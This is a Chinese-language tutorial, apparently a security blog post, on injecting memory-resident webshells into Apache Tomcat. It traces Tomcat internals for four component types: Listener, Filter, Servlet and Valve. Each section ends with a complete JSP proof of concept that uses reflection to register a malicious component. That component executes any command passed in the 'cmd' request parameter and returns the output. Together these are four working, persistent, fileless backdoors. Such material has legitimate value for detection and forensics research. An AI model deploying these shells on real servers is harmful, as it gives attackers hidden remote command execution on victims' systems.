Listener型

Listener顾名思义就是监听器,有好几种Listener:

  • HttpSessionListener:监听HttpSession的创建和销毁事件;
  • ServletRequestListener:监听ServletRequest请求的创建和销毁事件;
  • ServletRequestAttributeListener:监听ServletRequest请求的属性变化事件(即调用ServletRequest.setAttribute()方法);
  • ServletContextAttributeListener:监听ServletContext的属性变化事件(即调用ServletContext.setAttribute()方法);

ServletRequestListener为例,以下为一个demo:

import jakarta.servlet.ServletRequestEvent;
import jakarta.servlet.ServletRequestListener;
import jakarta.servlet.annotation.WebListener;

@WebListener
public class TestListener implements ServletRequestListener {
    @Override
    public void requestDestroyed(ServletRequestEvent sre) {
        System.out.println("requestDestroyed");
    }

    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        System.out.println("requestInitialized");
    }
}

debug一下创建过程

StandardContext#fireRequestInitEvent中创建了Listener

继续跟进getApplicationEventListeners方法

  public Object[] getApplicationEventListeners() {
      return this.applicationEventListenersList.toArray();
  }

可以看到Listener是存在Standard#applicationEventListenersList中的

  public void addApplicationEventListener(Object listener) {
      this.applicationEventListenersList.add(listener);
  }

而且可以通过addApplicationEventListener方法来添加listener

  public void addApplicationEventListener(Object listener) {
      this.applicationEventListenersList.add(listener);
  }

完整Poc:

<%@ page import="org.apache.catalina.connector.RequestFacade" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
    <%
        class EvilListener implements ServletRequestListener{
            @Override
            public void requestDestroyed(ServletRequestEvent sre) {
                ServletRequestListener.super.requestDestroyed(sre);
            }

            @Override
            public void requestInitialized(ServletRequestEvent sre) {
                try{
                    RequestFacade requestFacade = (RequestFacade) sre.getServletRequest();
                    Field requestField = RequestFacade.class.getDeclaredField("request");
                    requestField.setAccessible(true);
                    Request request = (Request) requestField.get(requestFacade);
                    Response resp = request.getResponse();
                    String cmd = request.getParameter("cmd");
                    if(cmd!=null){
                        try {
                            InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
                            InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
                            BufferedReader br = new BufferedReader(inputStreamReader);
                            String line = br.readLine();
                            String res = "";
                            while (line != null) {
                                res = res + line + '\n';
                                line = br.readLine();
                            }
                            resp.getWriter().write(res);
                        } catch (IOException e) {
                            throw new RuntimeException(e);
                        }
                    }
                } catch (Exception e){
                    System.out.println(e);
                }
            }
        }
        EvilListener evilListener = new EvilListener();
        Field reqfield = request.getClass().getDeclaredField("request");
        reqfield.setAccessible(true);
        Request req = (Request) reqfield.get(request);
        StandardContext standardContext = (StandardContext) req.getContext();
        standardContext.addApplicationEventListener(evilListener);
    %>
</body>
</html>

Filter型

创建一个Filter,并debug其创建过程

import jakarta.servlet.*;
import jakarta.servlet.annotation.WebFilter;

import java.io.IOException;
@WebFilter("/*")
public class TestFilter implements Filter {
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("doFilter");
        filterChain.doFilter(servletRequest, servletResponse);
    }

}

这里的ApplicationFilterChain#filters的类型是ApplicationFilterConfig,而他是在StandardWrapperValve#invoke方法中被创建的

ApplicationFilterChain filterChain = ApplicationFilterFactory.createFilterChain(request, wrapper, servlet);

跟进createFilterChain方法

    public static ApplicationFilterChain createFilterChain(ServletRequest request, Wrapper wrapper, Servlet servlet) {
        if (servlet == null) {
            return null;
        } else {
            ApplicationFilterChain filterChain = null;
            if (request instanceof Request) {
                Request req = (Request)request;
                if (Globals.IS_SECURITY_ENABLED) {
                    filterChain = new ApplicationFilterChain();
                } else {
                    filterChain = (ApplicationFilterChain)req.getFilterChain();
                    if (filterChain == null) {
                        filterChain = new ApplicationFilterChain();
                        req.setFilterChain(filterChain);
                    }
                }
            } else {
                filterChain = new ApplicationFilterChain();
            }

            filterChain.setServlet(servlet);
            filterChain.setServletSupportsAsync(wrapper.isAsyncSupported());
            StandardContext context = (StandardContext)wrapper.getParent();
            filterChain.setDispatcherWrapsSameObject(context.getDispatcherWrapsSameObject());
            FilterMap[] filterMaps = context.findFilterMaps();
            if (filterMaps != null && filterMaps.length != 0) {
                DispatcherType dispatcher = (DispatcherType)request.getAttribute("org.apache.catalina.core.DISPATCHER_TYPE");
                String requestPath = null;
                Object attribute = request.getAttribute("org.apache.catalina.core.DISPATCHER_REQUEST_PATH");
                if (attribute != null) {
                    requestPath = attribute.toString();
                }

                String servletName = wrapper.getName();
                FilterMap[] var10 = filterMaps;
                int var11 = filterMaps.length;

                int var12;
                FilterMap filterMap;
                ApplicationFilterConfig filterConfig;
                for(var12 = 0; var12 < var11; ++var12) {
                    filterMap = var10[var12];
                    if (matchDispatcher(filterMap, dispatcher) && matchFiltersURL(filterMap, requestPath)) {
                        filterConfig = (ApplicationFilterConfig)context.findFilterConfig(filterMap.getFilterName());
                        if (filterConfig != null) {
                            filterChain.addFilter(filterConfig);
                        }
                    }
                }

                var10 = filterMaps;
                var11 = filterMaps.length;

                for(var12 = 0; var12 < var11; ++var12) {
                    filterMap = var10[var12];
                    if (matchDispatcher(filterMap, dispatcher) && matchFiltersServlet(filterMap, servletName)) {
                        filterConfig = (ApplicationFilterConfig)context.findFilterConfig(filterMap.getFilterName());
                        if (filterConfig != null) {
                            filterChain.addFilter(filterConfig);
                        }
                    }
                }

                return filterChain;
            } else {
                return filterChain;
            }
        }
    }

首先通过StandardContext context = (StandardContext)wrapper.getParent();获取到StandardContext

然后通过FilterMap[] filterMaps = context.findFilterMaps();从StandardContext中获取FilterMap数组

public FilterMap[] findFilterMaps() {
    return this.filterMaps.asArray();
}

FilterMap中包含filetName以及urlPatterns

然后进入下面的for循环

  for(var12 = 0; var12 < var11; ++var12) {
      filterMap = var10[var12];
      if (matchDispatcher(filterMap, dispatcher) && matchFiltersURL(filterMap, requestPath)) {
          filterConfig = (ApplicationFilterConfig)context.findFilterConfig(filterMap.getFilterName());
          if (filterConfig != null) {
              filterChain.addFilter(filterConfig);
          }
      }
  }
public FilterConfig findFilterConfig(String name) {
    return (FilterConfig)this.filterConfigs.get(name);
}

如果当前请求的路径匹配上filterMap中的urlPatterns,就根据filterMap中的filterName从StandardContext中取出filterConfig,然后将其加入到filterChain中

filterConfig中包含filter和filterDef

那么我们就有了动态添加恶意filter的方法:

获取StandardContext对象,往里面添加我们构造的filterMap,filterConfig和filterDef

Poc:

<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="java.util.Map" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
    <%
        class EvilFilter implements Filter{

            @Override
            public void init(FilterConfig filterConfig) throws ServletException {
                Filter.super.init(filterConfig);
            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                String cmd = servletRequest.getParameter("cmd");
                InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
                InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
                BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
                String res = "";
                String line = bufferedReader.readLine();
                while(line != null){
                    res = res + line + '\n';
                    line = bufferedReader.readLine();
                }
                servletResponse.getWriter().write(res);
            }

            @Override
            public void destroy() {
                Filter.super.destroy();
            }
        }
        EvilFilter evilFilter = new EvilFilter();
        // 获取StandardContext
        Field reqfield = request.getClass().getDeclaredField("request");
        reqfield.setAccessible(true);
        Request req = (Request) reqfield.get(request);
        StandardContext standardContext = (StandardContext) req.getContext();
        // 创建FilterDef
        FilterDef filterDef = new FilterDef();
        filterDef.setFilterClass(evilFilter.getClass().getName());
        filterDef.setFilterName(evilFilter.getClass().getName());
        filterDef.setFilter(evilFilter);
        standardContext.addFilterDef(filterDef);
        // 创建FilterMap
        FilterMap filterMap = new FilterMap();
        filterMap.setFilterName(evilFilter.getClass().getName());
        filterMap.setDispatcher(DispatcherType.REQUEST.name());
        filterMap.addURLPattern("/*");
        standardContext.addFilterMapBefore(filterMap);
        // 创建ApplicationFilterConfig
        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

        Field filterConfigsfield = standardContext.getClass().getDeclaredField("filterConfigs");
        filterConfigsfield.setAccessible(true);
        filterConfigsfield.get(standardContext);
        Map filterConfigs = (Map) filterConfigsfield.get(standardContext);
        filterConfigs.put(evilFilter.getClass().getName(),filterConfig);
    %>
</body>
</html>

Servlet型

Context 负责管理 Wapper ,而 Wapper 又负责管理 Servlet 实例

创建一个servlet,在StandardWapper#setServletClass处下断点,回溯到上一层的ContextConfig#configureConetxt:

        while(var35.hasNext()) {
            ServletDef servlet = (ServletDef)var35.next();
            Wrapper wrapper = this.context.createWrapper();
            if (servlet.getLoadOnStartup() != null) {
                wrapper.setLoadOnStartup(servlet.getLoadOnStartup());
            }

            if (servlet.getEnabled() != null) {
                wrapper.setEnabled(servlet.getEnabled());
            }

            wrapper.setName(servlet.getServletName());
            Map<String, String> params = servlet.getParameterMap();
            var7 = params.entrySet().iterator();

            while(var7.hasNext()) {
                Map.Entry<String, String> entry = (Map.Entry)var7.next();
                wrapper.addInitParameter((String)entry.getKey(), (String)entry.getValue());
            }

            wrapper.setRunAs(servlet.getRunAs());
            Set<SecurityRoleRef> roleRefs = servlet.getSecurityRoleRefs();
            Iterator var37 = roleRefs.iterator();

            while(var37.hasNext()) {
                SecurityRoleRef roleRef = (SecurityRoleRef)var37.next();
                wrapper.addSecurityReference(roleRef.getName(), roleRef.getLink());
            }

            wrapper.setServletClass(servlet.getServletClass());
            MultipartDef multipartdef = servlet.getMultipartDef();
            if (multipartdef != null) {
                long maxFileSize = -1L;
                long maxRequestSize = -1L;
                int fileSizeThreshold = 0;
                if (null != multipartdef.getMaxFileSize()) {
                    maxFileSize = Long.parseLong(multipartdef.getMaxFileSize());
                }

                if (null != multipartdef.getMaxRequestSize()) {
                    maxRequestSize = Long.parseLong(multipartdef.getMaxRequestSize());
                }

                if (null != multipartdef.getFileSizeThreshold()) {
                    fileSizeThreshold = Integer.parseInt(multipartdef.getFileSizeThreshold());
                }

                wrapper.setMultipartConfigElement(new MultipartConfigElement(multipartdef.getLocation(), maxFileSize, maxRequestSize, fileSizeThreshold));
            }

            if (servlet.getAsyncSupported() != null) {
                wrapper.setAsyncSupported(servlet.getAsyncSupported());
            }

            wrapper.setOverridable(servlet.isOverridable());
            this.context.addChild(wrapper);
        }

在这里可以很清楚的看到Wrapper的初始化流程,首先调用context#createWrapper创建wrapper,这里需要留意的一个特殊属性是load-on-startup属性,它是一个启动优先级,只有load-on-startup属性大于0的wrapper加载

配置好wrapper后通过context#addChild添加到StandardContext中

    public void addChild(Container child) {
        Wrapper oldJspServlet = null;
        if (!(child instanceof Wrapper)) {
            throw new IllegalArgumentException(sm.getString("standardContext.notWrapper"));
        } else {
            boolean isJspServlet = "jsp".equals(child.getName());
            if (isJspServlet) {
                oldJspServlet = (Wrapper)this.findChild("jsp");
                if (oldJspServlet != null) {
                    this.removeChild(oldJspServlet);
                }
            }

            super.addChild(child);
            if (isJspServlet && oldJspServlet != null) {
                String[] jspMappings = oldJspServlet.findMappings();

                for(int i = 0; jspMappings != null && i < jspMappings.length; ++i) {
                    this.addServletMappingDecoded(jspMappings[i], child.getName());
                }
            }

        }
    }

这里通过addServletMappingDecoded方法添加servlet-name和对应的url-pattern的映射

在ApplicationContext#AddServlet方法中也可以看到添加Servlet的过程

    private ServletRegistration.Dynamic addServlet(String servletName, String servletClass, Servlet servlet, Map<String, String> initParams) throws IllegalStateException {
        if (servletName != null && !servletName.equals("")) {
            if (!this.context.getState().equals(LifecycleState.STARTING_PREP)) {
                throw new IllegalStateException(sm.getString("applicationContext.addServlet.ise", new Object[]{this.getContextPath()}));
            } else {
                Wrapper wrapper = (Wrapper)this.context.findChild(servletName);
                if (wrapper == null) {
                    wrapper = this.context.createWrapper();
                    wrapper.setName(servletName);
                    this.context.addChild(wrapper);
                } else if (wrapper.getName() != null && wrapper.getServletClass() != null) {
                    if (!wrapper.isOverridable()) {
                        return null;
                    }

                    wrapper.setOverridable(false);
                }

                ServletSecurity annotation = null;
                if (servlet == null) {
                    wrapper.setServletClass(servletClass);
                    Class<?> clazz = Introspection.loadClass(this.context, servletClass);
                    if (clazz != null) {
                        annotation = (ServletSecurity)clazz.getAnnotation(ServletSecurity.class);
                    }
                } else {
                    wrapper.setServletClass(servlet.getClass().getName());
                    wrapper.setServlet(servlet);
                    if (this.context.wasCreatedDynamicServlet(servlet)) {
                        annotation = (ServletSecurity)servlet.getClass().getAnnotation(ServletSecurity.class);
                    }
                }

                if (initParams != null) {
                    Iterator var9 = initParams.entrySet().iterator();

                    while(var9.hasNext()) {
                        Map.Entry<String, String> initParam = (Map.Entry)var9.next();
                        wrapper.addInitParameter((String)initParam.getKey(), (String)initParam.getValue());
                    }
                }

                ServletRegistration.Dynamic registration = new ApplicationServletRegistration(wrapper, this.context);
                if (annotation != null) {
                    registration.setServletSecurity(new ServletSecurityElement(annotation));
                }

                return registration;
            }
        } else {
            throw new IllegalArgumentException(sm.getString("applicationContext.invalidServletName", new Object[]{servletName}));
        }
    }

那么就有了动态添加servlet的方法:通过 context#createWapper创建 Wapper 对象,配置好wapper后通过context#addChild添加到StandardContext中,再通过context#addServletMappingDecoded将 url 路径和 servlet 类做映射

Poc

<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="org.apache.catalina.Wrapper" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
<%
    class EvilServlet implements Servlet{
        @Override
        public void init(ServletConfig servletConfig) throws ServletException {

        }

        @Override
        public ServletConfig getServletConfig() {
            return null;
        }

        @Override
        public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
            String cmd = servletRequest.getParameter("cmd");
            InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
            InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
            BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
            String res = "";
            String line = bufferedReader.readLine();
            while(line != null){
                res = res + line + '\n';
                line = bufferedReader.readLine();
            }
            servletResponse.getWriter().write(res);
        }

        @Override
        public String getServletInfo() {
            return null;
        }

        @Override
        public void destroy() {

        }
    }
    EvilServlet evilServlet = new EvilServlet();
    Field reqfield = request.getClass().getDeclaredField("request");
    reqfield.setAccessible(true);
    Request req = (Request) reqfield.get(request);
    StandardContext standardContext = (StandardContext) req.getContext();
    Wrapper wrapper = standardContext.createWrapper();
    wrapper.setServletClass(evilServlet.getClass().getName());
    wrapper.setName(evilServlet.getClass().getSimpleName());
    wrapper.setServlet(evilServlet);
    wrapper.setLoadOnStartup(1);
    standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/evil",evilServlet.getClass().getSimpleName());
%>
</body>
</html>

Valve型

Tomcat中采用管道机制来处理Request和Response请求

在 Tomcat 中定义了两个接口:Pipeline(管道)和 Valve(阀)。这两个接口名字很好的诠释了处理模式:数据流就像是流经管道的水一样,经过管道上个一个个阀门。

Pipeline 中会有一个最基础的 Valve(basic),它始终位于末端(最后执行),封装了具体的请求处理和输出响应的过程。Pipeline 提供了 addValve 方法,可以添加新 Valve 在 basic 之前,并按照添加顺序执行

Tomcat 每个层级的容器(Engine、Host、Context、Wrapper),都有基础的 Valve 实现(StandardEngineValve、StandardHostValve、StandardContextValve、StandardWrapperValve),他们同时维护了一个 Pipeline 实例(StandardPipeline)

Pipeline接口继承了Contained接口,提供了对valve的各种操作

public interface Pipeline extends Contained {
    Valve getBasic();

    void setBasic(Valve var1);

    void addValve(Valve var1);

    Valve[] getValves();

    void removeValve(Valve var1);

    Valve getFirst();

    boolean isAsyncSupported();

    void findNonAsyncValves(Set<String> var1);
}

Valve接口

public interface Valve {
    Valve getNext();

    void setNext(Valve var1);

    void backgroundProcess();

    void invoke(Request var1, Response var2) throws IOException, ServletException;

    boolean isAsyncSupported();
}

通过getNext方法获取下一个vale,类似filterchain的dofilter

Tomcat 中四个层级的容器都继承了 ContainerBase ,所以在哪个层级的容器的标准实现上添加自定义的 Valve 均可。

添加后,将会在 org.apache.catalina.connector.CoyoteAdapterservice 方法中调用 Valve 的 invoke 方法。

因此构造Valve的思路:编写恶意valve类,获取StandardPipeline对象,通过addValve方法将恶意valve类加入StandardPipeline对象中

Poc:

<%@ page import="org.apache.catalina.valves.ValveBase" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.Pipeline" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
<%
  class EvilValve extends ValveBase{
    @Override
    public void invoke(Request request, Response response) throws IOException, ServletException {
      String cmd = request.getParameter("cmd");
      InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
      InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
      BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
      String res = "";
      String line = bufferedReader.readLine();
      while(line != null){
        res = res + line + '\n';
        line = bufferedReader.readLine();
      }
      response.getWriter().write(res);
    }
  }
  EvilValve evilValve = new EvilValve();
  Field reqfield = request.getClass().getDeclaredField("request");
  reqfield.setAccessible(true);
  Request req = (Request) reqfield.get(request);
  Pipeline pipeline = req.getContext().getPipeline();
  pipeline.addValve(evilValve);
%>
</body>
</html>